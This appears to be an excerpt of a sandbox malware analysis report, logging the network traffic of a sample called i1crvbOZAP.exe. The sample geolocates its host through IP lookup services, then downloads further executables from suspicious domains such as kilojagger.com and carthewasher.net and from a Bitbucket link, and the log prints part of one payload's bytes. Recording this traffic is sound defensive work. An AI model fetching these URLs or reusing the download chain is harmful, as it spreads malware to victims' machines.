6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	104.26.9.59	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:53 UTC	187	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: api.myip.com
2024-03-28 08:14:54 UTC	569	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBO7Qs3EydHK3C%2FxIxJPU4eiByt5%2F0bcvrj7xX%2FrfMcuuQXydHTOIBMkv2RRz9BimQjQEacdnNFhzP5nEBFAs7AE29CIvIhwGx0gup%2Bl7WYiOCnmgZyZeTj%2FQa05xA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b539aa020d6-IAD
2024-03-28 08:14:54 UTC	64	IN	Data Raw: 33 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a Data Ascii: 3a{"ip":"102.165.48.43","country":"United States","cc":"US"}
2024-03-28 08:14:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	34.117.186.192	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:54 UTC	238	OUT	GET /widget/demo/102.165.48.43 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: ipinfo.io
2024-03-28 08:14:54 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 28 Mar 2024 08:14:54 GMT content-type: application/json; charset=utf-8 Content-Length: 1021 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-28 08:14:54 UTC	738	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 38 39 35 31 2c 2d 37 37 2e 30 33 36 34 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 30 30 34 22 2c 0a 20 20 20 20 22 74 69 6d 65 Data Ascii: { "input": "102.165.48.43", "data": { "ip": "102.165.48.43", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.8951,-77.0364", "org": "AS174 Cogent Communications", "postal": "20004", "time
2024-03-28 08:14:54 UTC	283	IN	Data Raw: 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 47 72 6f 75 6e 64 20 46 6c 6f 6f 72 2c 20 34 20 56 69 63 74 6f 72 69 61 20 53 71 75 61 72 65 2c 20 53 74 20 41 6c 62 61 6e 73 2c 20 48 65 72 74 66 6f 72 64 73 68 69 72 65 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 47 42 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 69 70 78 6f 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 64 76 69 6e 61 73 20 52 61 63 6b 61 75 73 6b 61 73 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 30 32 2e 31 36 35 2e 30 2e 30 2f 31 38 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 74 65 6c 3a 2b Data Ascii: ": { "address": "Ground Floor, 4 Victoria Square, St Albans, Hertfordshire, London, United Kingdom", "country": "GB", "email": "abuse@ipxo.com", "name": "Edvinas Rackauskas", "network": "102.165.0.0/18", "phone": "tel:+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49758	104.21.42.248	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:58 UTC	229	OUT	HEAD /bjhgvfd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: 294anacamptometer.sbs Connection: Keep-Alive
2024-03-28 08:14:59 UTC	674	IN	HTTP/1.1 404 Not Found Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 28 Mar 2024 08:14:59 GMT Set-Cookie: _subid=2os9o961spv0l; expires=Sun, 28 Apr 2024 08:14:59 GMT; path=/ Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q; expires=Fri, 24 Jun 2078 16:29:58 GMT; path=/ Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 86b62b737f2c0815-IAD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49761	172.67.180.119	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:59 UTC	228	OUT	GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: triedchicken.net Cache-Control: no-cache
2024-03-28 08:14:59 UTC	698	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://carthewasher.net/0a9ab821666277b5dd3929d09bffe743/cad54ba5b01423b1af8ec10ab5719d97.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IvUhXdXlN1CmzWcLC2eG4LMnOgh3CldUDUy1J4WOlNqmSWYMsRBO%2FbmlovLdomxdKaE%2B%2BH7yOZuJ%2Ft%2FQjtYBEULPSOC1xaATk39gYt6IOoCsZlq4kTSAct7tyE8fY9qXXDWU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b73de201fdf-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:14:59 UTC	136	IN	Data Raw: 38 32 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 72 74 68 65 77 61 73 68 65 72 2e 6e 65 74 2f 30 61 39 61 62 38 32 31 36 36 36 32 37 37 62 35 64 64 33 39 32 39 64 30 39 62 66 66 65 37 34 33 2f 63 61 64 35 34 62 61 35 62 30 31 34 32 33 62 31 61 66 38 65 63 31 30 61 62 35 37 31 39 64 39 37 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: 82<a href="https://carthewasher.net/0a9ab821666277b5dd3929d09bffe743/cad54ba5b01423b1af8ec10ab5719d97.exe">Temporary Redirect</a>.
2024-03-28 08:14:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49760	104.21.36.53	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:59 UTC	228	OUT	GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: cybervincent.com Cache-Control: no-cache
2024-03-28 08:14:59 UTC	690	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://kilojagger.com/0a9ab821666277b5dd3929d09bffe743/7725eaa6592c80f8124e769b4e8a07f7.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztaGqfufcBDMKmCUxETe2EEiQtzIRj8VQyQlfZUw3wXdB2LJ85vzibYLxth6CjSaJ%2By1HE8YoYJZTP6FKGU6iKFQdluFj9xEzjRsw9oyDiN%2FtX6e9wXQ0T0K2EYRaShvTXMf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b73d8a72066-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:14:59 UTC	134	IN	Data Raw: 38 30 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 69 6c 6f 6a 61 67 67 65 72 2e 63 6f 6d 2f 30 61 39 61 62 38 32 31 36 36 36 32 37 37 62 35 64 64 33 39 32 39 64 30 39 62 66 66 65 37 34 33 2f 37 37 32 35 65 61 61 36 35 39 32 63 38 30 66 38 31 32 34 65 37 36 39 62 34 65 38 61 30 37 66 37 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: 80<a href="https://kilojagger.com/0a9ab821666277b5dd3929d09bffe743/7725eaa6592c80f8124e769b4e8a07f7.exe">Temporary Redirect</a>.
2024-03-28 08:14:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49759	18.205.93.0	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:59 UTC	234	OUT	GET /ixef571134343/ef571134343/downloads/Start.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: bitbucket.org Cache-Control: no-cache
2024-03-28 08:14:59 UTC	4316	IN	HTTP/1.1 302 Found server: envoy x-usage-quota-remaining: 999163.813 vary: Accept-Language, Origin x-usage-request-cost: 849.10 cache-control: max-age=0, no-cache, no-store, must-revalidate, private Content-Type: text/html; charset=utf-8 x-b3-traceid: 5b84ae4121f9695d x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Thu, 28 Mar 2024 08:14:59 GMT x-usage-user-time: 0.025255 x-usage-system-time: 0.000218 location: https://bbuseruploads.s3.amazonaws.com/e14c6eb6-712a-4c2e-be84-37a1de2550e3/downloads/ddaff67e-23e9-45d6-b114-ae41de265d36/Start.exe?response-content-disposition=attachment%3B%20filename%3D%22Start.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAB3POAY3&Signature=3kDIIlaGVwgd2Exw7Puex%2FlGpQo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQDhHqaiQO5ftJoYENXqYI3qOUsxKtJmtL5TyDU8XRCQpgIhALTEr1oPjk5GlozLK44TJQxo2B9PWb3F8vt9A66nptTFKrACCNH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzjabjAh4jtdqFTXO8qhAKc%2FJCUi8r7C2rKpJ6nTOBKVhhNuTfp0qyzeYXq3z5zb1SOBopYqoPnADE6EcT5B63SdEanUmptHSjNoRDCfbaJATgqQMr2zoj8W7o%2BLo3H4Zg7DvK%2Fh3CfkFJIe3eIDeK5ugIsMz3MnRS9bNVX%2BcnAmrcAh%2BLT0z9IvvAxRjvFzYyLF%2FjD3GZJp1E2ykbjBzBreBe4mJ8QG%2FpJRnNX%2FzBOVs16I6JWDVjjNvkEjrr88qyKsqOC%2Bkq0Zql9hqo2bUEqWZB5IYTIBgns0vp2SnzyrfrU4EYav2Ocri113OUEwF%2BuqrzzIbJVlFlU%2BDZaiZ3JnC%2F8fsZb26UgILl75oPvRz55yTDWypSwBjqcAUsNXCnm%2F1yH8Tt9PM2FrdznncEhI8VB3%2FUWYkOw78tlqOIqDRNWTLh1OCJMAeCnMcCqejljL%2FrkTEa%2BDm%2Bbl4DnM9S%2BFv1NUD3keKurkqOpub1OaR34rpEANOAiBrWsHoegfz6J2mZQrWsZPo%2FVAtv9i0X472Wr4oV5dwAK6OvyCX4xw8dKzr2mFblnik%2FDvWIBi5kNW73qgBolRA%3D%3D&Expires=1711615070 expires: Thu, 28 Mar 2024 08:14:59 GMT x-served-by: 2b8b560ee084 x-envoy-upstream-service-time: 55 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-b3-spanid: 5b84ae4121f9695d x-static-version: 093175f8ad3d x-render-time: 0.044634103775024414 Connection: close x-usage-input-ops: 0 x-version: 093175f8ad3d x-request-count: 2421 x-frame-options: SAMEORIGIN X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49767	172.67.218.160	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:14:59 UTC	283	OUT	GET /0a9ab821666277b5dd3929d09bffe743/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: kilojagger.com Connection: Keep-Alive
2024-03-28 08:15:00 UTC	675	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4371848 Connection: close Last-Modified: Thu, 28 Mar 2024 07:43:57 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oY3WzVVW12P7SbLGshp%2BlpAMLwiVvPZrHsXtZzOWjiBm94mXE85j2qwvECanq2N9upd8Oap5oaLfl30twOlwwVTRY00zcvMEy%2F4%2FOQWyMmEFhw90hYqbzXe4lCdfl3q1MQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b78fed2389d-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:15:00 UTC	694	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fe fc 51 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQd
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 56 ff 15 00 00 41 00 56 8d 85 80 fa ff ff 50 ff 15 24 00 41 00 56 56 e8 36 1b 00 00 56 56 e8 ad 1f 00 00 56 e8 6b 1f 00 00 f3 0f 10 05 ec 55 41 00 83 c4 14 0f 5a c0 56 51 51 f2 0f 11 04 24 e8 71 17 00 00 56 dd d8 e8 48 1f 00 00 83 c4 10 e8 3b 24 00 00 a1 98 bf 41 00 81 c1 4b 13 01 00 51 56 a3 28 34 ec 00 89 0d 24 33 ec 00 ff 15 28 00 41 00 8d 4d dc a3 7c 32 ec 00 51 6a 40 ff 35 24 33 ec 00 50 ff 15 84 00 41 00 bf 6e 15 29 00 56 8d 85 80 ea ff ff 50 ff 15 90 01 41 00 4f 75 ef 8b 0d 24 33 ec 00 8b fe 85 c9 74 78 a1 28 34 ec 00 8a 8c 38 4b 13 01 00 a1 7c 32 ec 00 88 0c 38 8b 0d 24 33 ec 00 81 f9 90 04 00 00 75 51 8d 85 80 fe ff ff 50 ff 15 3c 00 41 00 8d 45 f0 50 56 8d 45 94 50 56 ff 15 60 00 41 00 56 ff 15 68 00 41 00 56 8d 85 80 fa ff ff 50 8d 45 e4 50 8d Data Ascii: VAVP$AVV6VVVkUAZVQQ$qVH;$AKQV(4$3(AM\|2Qj@5$3PAn)VPAOu$3tx(48K\|28$3uQP<AEPVEPV`AVhAVPEP
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: 8b ce e8 df 00 00 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 45 0c 53 8b 5d 08 56 57 8b f1 8b 7b 10 3b f8 72 74 2b f8 39 7d 10 0f 42 7d 10 3b f3 75 17 03 c7 50 e8 27 01 00 00 8b 45 0c 8b ce 50 6a 00 e8 49 01 00 00 eb 47 6a 00 57 e8 c1 01 00 00 84 c0 74 3b 83 7b 14 10 72 02 8b 1b 83 7e 14 10 72 04 8b 0e eb 02 8b ce 85 ff 74 10 8b 45 0c 57 03 c3 50 51 e8 50 05 00 00 83 c4 0c 83 7e 14 10 89 7e 10 72 04 8b 06 eb 02 8b c6 c6 04 38 00 5f 8b c6 5e 5b 5d c2 0c 00 68 d4 55 41 00 e8 f5 04 00 00 cc 55 8b ec 80 7d 08 00 56 57 8b 7d 0c 8b f1 74 20 83 7e 14 10 72 1a 53 8b 1e 85 ff 74 0b 57 53 56 e8 01 05 00 00 83 c4 0c 53 e8 a2 19 00 00 59 5b 89 7e 10 c7 46 14 0f 00 00 00 c6 04 37 00 5f 5e 5d c2 08 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7d 01 00 00 84 c0 74 1c 83 7e 14 10 72 Data Ascii: ^]UES]VW{;rt+9}B};uP'EPjIGjWt;{r~rtEWPQP~~r8_^[]hUAU}VW}t ~rStWSVSY[~F7_^]US]VS}t~r
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: f0 c7 45 f0 f4 0f 41 00 50 e8 c7 1e 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 b8 23 00 00 68 68 5b 41 00 8d 45 f4 c7 45 f4 1c 10 41 00 50 e8 99 1e 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 8a 23 00 00 68 a4 5b 41 00 8d 45 f4 c7 45 f4 28 10 41 00 50 e8 6b 1e 00 00 cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 68 03 00 00 0f ba 25 7c dd 81 00 01 73 07 f3 a4 e9 17 03 00 00 81 f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 08 70 41 00 01 0f 82 da 04 00 00 0f ba 25 7c dd 81 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f Data Ascii: EAPUEMEEP#hh[AEEAPUEMEEP#h[AEE(APkWVt$L$\|$;v;h%\|s3u%pA%\|sv
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: c3 90 8a 46 03 88 47 03 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 Data Ascii: FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIu
2024-03-28 08:15:00 UTC	1369	IN	Data Raw: c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 54 2a 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 54 2a 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 54 2a 40 00 8d 49 00 08 2a 40 00 10 2a 40 00 18 2a 40 00 20 2a 40 00 28 2a 40 00 30 2a 40 00 38 2a 40 00 4b 2a 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 54 2a 40 00 8b ff 64 2a 40 00 6c 2a 40 00 7c 2a 40 00 90 2a 40 00 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 Data Ascii: r$T@IF#GFGr$T@F#GFGFGV$T@I@@@ @(@0@8@K@DDDDDDDDDDDDDD$T@d@l@\|@@D$^_FG
